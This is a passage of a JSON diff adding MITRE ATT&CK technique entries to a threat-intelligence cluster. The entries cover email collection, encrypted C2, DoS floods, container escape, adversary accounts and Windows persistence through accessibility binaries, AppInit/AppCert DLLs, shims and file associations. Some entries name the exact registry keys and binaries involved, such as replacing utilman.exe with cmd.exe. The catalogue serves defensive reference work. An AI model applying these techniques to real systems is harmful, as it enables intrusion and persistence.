Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://app.tidalcyber.com/software/d762974a-ca7e-45ee-bc1d-f5218bf46c84) can be used to automate searches for specific keywords.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1114.002" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "5de59320-1471-4715-99c4-eda2f7996d07", + "value": "Remote Email Collection" + }, + { + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "meta": { + "platforms": [ + "Google Workspace", + "Linux", + "macOS", + "Office 365", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + }, + { + "dest-uuid": "59db734e-9edb-4c92-b2ca-a72fe1e08ac7", + "type": "similar" + }, + { + "dest-uuid": "9a388756-9de0-45ea-9820-810443733789", + "type": "similar" + }, + { + "dest-uuid": "5de59320-1471-4715-99c4-eda2f7996d07", + "type": "similar" + } + ], + "uuid": "3569b783-1be5-414b-adb9-42c47ceee1cc", + "value": "Email Collection" + }, + { + "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://app.tidalcyber.com/technique/ce822cce-f7f1-4753-bff1-12e5bef66d53).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1573.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "ce822cce-f7f1-4753-bff1-12e5bef66d53", + "value": "Asymmetric Cryptography" + }, + { + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1573.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "ac7b9775-8323-49cb-8fef-3cef972f11ac", + "value": "Symmetric Cryptography" + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "ce822cce-f7f1-4753-bff1-12e5bef66d53", + "type": "similar" + }, + { + "dest-uuid": "ac7b9775-8323-49cb-8fef-3cef972f11ac", + "type": "similar" + } + ], + "uuid": "0e704680-c930-42a7-9caa-5802b8cb2c48", + "value": "Encrypted Channel" + }, + { + "description": "Adversaries may target resource intensive features of applications to cause a denial of service (DoS), denying availability to those applications. For example, specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself.[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1499.003" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "49ef3482-7b75-4097-b9a6-6c9cb99d865c", + "value": "Application Exhaustion Flood" + }, + { + "description": "Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. [[Sucuri BIND9 August 2015](https://app.tidalcyber.com/references/5e108782-2f32-4704-be01-055d9e767216)] Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent denial of service (DoS) condition.\n\nAdversaries may exploit known or zero-day vulnerabilities to crash applications and/or systems, which may also lead to dependent applications and/or systems to be in a DoS condition. Crashed or restarted applications or systems may also have other effects such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34), [Firmware Corruption](https://app.tidalcyber.com/technique/559c647a-7759-4943-856d-dc717b5a443e), [Service Stop](https://app.tidalcyber.com/technique/e27c5756-f43e-424f-af62-b21e8b304e5d) etc. which may further cause a DoS condition and deny availability to critical information, applications and/or systems. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1499.004" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "2109de05-5b45-4519-94a2-6c04f7d88286", + "value": "Application or System Exploitation" + }, + { + "description": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.\n\nDifferent ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)] With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.[[Cloudflare SynFlood](https://app.tidalcyber.com/references/e292c4fe-ae77-4393-b666-fb6290cb4aa8)]\n\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.[[Corero SYN-ACKflood](https://app.tidalcyber.com/references/ec41de8a-c673-41bf-b713-4a647b135532)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1499.001" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "b05b5092-60f8-4324-aee3-7522753439ac", + "value": "OS Exhaustion Flood" + }, + { + "description": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.[[Arbor AnnualDoSreport Jan 2018](https://app.tidalcyber.com/references/cede4c72-718b-48c2-8a59-1f91555f6cf6)] Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.[[Cloudflare HTTPflood](https://app.tidalcyber.com/references/1a5934a4-35ce-4f7c-be9c-c1faf4ee0838)]\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.[[Arbor SSLDoS April 2012](https://app.tidalcyber.com/references/b5de4376-0deb-45de-83a0-09df98480464)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1499.002" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "03619027-8a54-4cb2-8f1d-38d476edbdd8", + "value": "Service Exhaustion Flood" + }, + { + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[[FireEye OpPoisonedHandover February 2016](https://app.tidalcyber.com/references/1d57b1c8-930b-4bcb-a51e-39020327cc5d)] and to support other malicious activities, including distraction[[FSISAC FraudNetDoS September 2012](https://app.tidalcyber.com/references/9c8772eb-6d1d-4742-a2db-a5e1006effaa)], hacktivism, and extortion.[[Symantec DDoS October 2014](https://app.tidalcyber.com/references/878e0382-4191-4bca-8adc-c379b0d57ba8)]\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[[USNYAG IranianBotnet March 2016](https://app.tidalcyber.com/references/69ee73c1-359f-4584-a6e7-75119d24bbf5)]\n\nIn cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[[ArsTechnica Great Firewall of China](https://app.tidalcyber.com/references/1a08d58f-bf91-4345-aa4e-2906d3ef365a)]\n\nFor attacks attempting to saturate the providing network, see [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).\n", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + }, + { + "dest-uuid": "49ef3482-7b75-4097-b9a6-6c9cb99d865c", + "type": "similar" + }, + { + "dest-uuid": "2109de05-5b45-4519-94a2-6c04f7d88286", + "type": "similar" + }, + { + "dest-uuid": "b05b5092-60f8-4324-aee3-7522753439ac", + "type": "similar" + }, + { + "dest-uuid": "03619027-8a54-4cb2-8f1d-38d476edbdd8", + "type": "similar" + } + ], + "uuid": "8b0caea0-602e-4117-8322-b125150f5c2a", + "value": "Endpoint Denial of Service" + }, + { + "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.[[Docker Overview](https://app.tidalcyber.com/references/52954bb1-16b0-4717-a72c-8a6dec97610b)]\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.[[Docker Bind Mounts](https://app.tidalcyber.com/references/b298b3d1-30c1-4894-b1de-be11812cde6b)][[Trend Micro Privileged Container](https://app.tidalcyber.com/references/92ac290c-4863-4774-b334-848ed72e3627)][[Intezer Doki July 20](https://app.tidalcyber.com/references/688b2582-6602-44e1-aaac-3a4b8e168b04)][[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)][[Crowdstrike Kubernetes Container Escape](https://app.tidalcyber.com/references/84d5f015-9014-417c-b2a9-f650fe19d448)][[Keyctl-unmask](https://app.tidalcyber.com/references/75db8c88-e547-4d1b-8f22-6ace2b3d7ad4)]\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://app.tidalcyber.com/technique/0b9609dd-9f19-4747-ba6e-421b6b7ff03f).[[Container Escape](https://app.tidalcyber.com/references/8248917a-9afd-4ec6-a086-1a97a68deff1)] Adversaries may also escape via [Exploitation for Privilege Escalation](https://app.tidalcyber.com/technique/9cc715d7-9969-485f-87a2-c9f7ed3cc44c), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.[[Windows Server Containers Are Open](https://app.tidalcyber.com/references/9a801256-5852-433e-95bd-768f9b70b9fe)]\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "meta": { + "platforms": [ + "Containers", + "Linux", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "bebaf25b-9f50-4e3b-96cc-cc55c5765b61", + "value": "Escape to Host" + }, + { + "description": "Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://app.tidalcyber.com/technique/ce886c55-17ab-4c1c-90dc-3aa93e69bdb4) or to [Upload Tool](https://app.tidalcyber.com/technique/d7594eaf-286f-4484-94fa-8608c911767a)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://app.tidalcyber.com/technique/2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23)s or [Serverless](https://app.tidalcyber.com/technique/c30faf84-496b-4f27-a4bc-aa36d583c69f) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[[Awake Security C2 Cloud](https://app.tidalcyber.com/references/fa3762ce-3e60-4991-b464-12601d2a6912)]\n\nCreating [Cloud Accounts](https://app.tidalcyber.com/technique/4c7e52b1-9881-4966-b9b5-d88c5e88d604) may also require adversaries to establish [Email Accounts](https://app.tidalcyber.com/technique/1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb) to register with the cloud provider. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1585.003" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "4c7e52b1-9881-4966-b9b5-d88c5e88d604", + "value": "Cloud Accounts" + }, + { + "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)] Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://app.tidalcyber.com/technique/fe0bf22c-efb2-4bc6-96d8-e0e909502fd7), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://app.tidalcyber.com/technique/b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d)).[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.[[Trend Micro R980 2016](https://app.tidalcyber.com/references/6afd89ba-2f51-4192-82b3-d961cc86adf1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1585.002" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb", + "value": "Email Accounts" + }, + { + "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)] These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1585.001" + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + } + ], + "uuid": "fe0bf22c-efb2-4bc6-96d8-e0e909502fd7", + "value": "Social Media Accounts" + }, + { + "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.[[NEWSCASTER2014](https://app.tidalcyber.com/references/9abb4bbb-bad3-4d22-b235-c8a35465f2ce)][[BlackHatRobinSage](https://app.tidalcyber.com/references/82068e93-a3f8-4d05-9358-6fe76a0055bb)]\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", + "meta": { + "platforms": [ + "PRE" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "type": "uses" + }, + { + "dest-uuid": "4c7e52b1-9881-4966-b9b5-d88c5e88d604", + "type": "similar" + }, + { + "dest-uuid": "1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb", + "type": "similar" + }, + { + "dest-uuid": "fe0bf22c-efb2-4bc6-96d8-e0e909502fd7", + "type": "similar" + } + ], + "uuid": "9a2d6628-0dd7-4f25-a242-b752fcf47ff4", + "value": "Establish Accounts" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)] The [Image File Execution Options Injection](https://app.tidalcyber.com/technique/91d813d3-c17c-4c4c-b86e-0667f669a2f4) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://app.tidalcyber.com/technique/f5fb86b6-abf0-4d44-b4a0-56f0636c24d2) will cause the replaced file to be executed with SYSTEM privileges. [[Tilbury 2014](https://app.tidalcyber.com/references/136325ee-0712-49dd-b3ab-a6f2bfb218b0)]\n\nOther accessibility features exist that may also be leveraged in a similar fashion: [[DEFCON2016 Sticky Keys](https://app.tidalcyber.com/references/f903146d-b63d-4771-8d53-28ef137c9349)][[Narrator Accessibility Abuse](https://app.tidalcyber.com/references/fc889ba3-79a5-445a-81ea-dfe81c1cc542)]\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.008" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba", + "value": "Accessibility Features" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n\nSimilar to [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.009" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "4216058d-0912-4ff3-a7fd-dd7a7b346c96", + "value": "AppCert DLLs" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. [[AppInit Registry](https://app.tidalcyber.com/references/dd3f98d9-0228-45a6-9e7b-1babf911a9ac)] Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. [[AppInit Secure Boot](https://app.tidalcyber.com/references/2b951be3-5105-4665-972f-7809c057fd3f)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.010" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "36b58363-ca6a-4614-bf6f-bfaecafedb5f", + "value": "AppInit DLLs" + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://app.tidalcyber.com/technique/5e1499a1-f1ad-4929-84e1-5d33c371c02d) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. [[FireEye Application Shimming](https://app.tidalcyber.com/references/658c8dd6-1a6a-40f0-a7b5-286fd4b1985d)] Shims can also be abused to establish persistence by continuously being invoked by affected programs.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.011" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": "efbbe9d1-274c-4383-9c6c-44bd4eca1829", + "value": "Application Shimming" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.[[Microsoft Change Default Programs](https://app.tidalcyber.com/references/de515277-a280-40e5-ba34-3e8f16a5c703)][[Microsoft File Handlers](https://app.tidalcyber.com/references/cc12cd2c-4f41-4d7b-902d-53c35eb41210)][[Microsoft Assoc Oct 2017](https://app.tidalcyber.com/references/63fb65d7-6423-42de-b868-37fbc2bc133d)] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command. For example: \n\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.[[TrendMicro TROJ-FAKEAV OCT 2012](https://app.tidalcyber.com/references/5d9e974f-07f8-48e4-96b6-632ecb31465d)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1546.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + } + ], + "uuid": 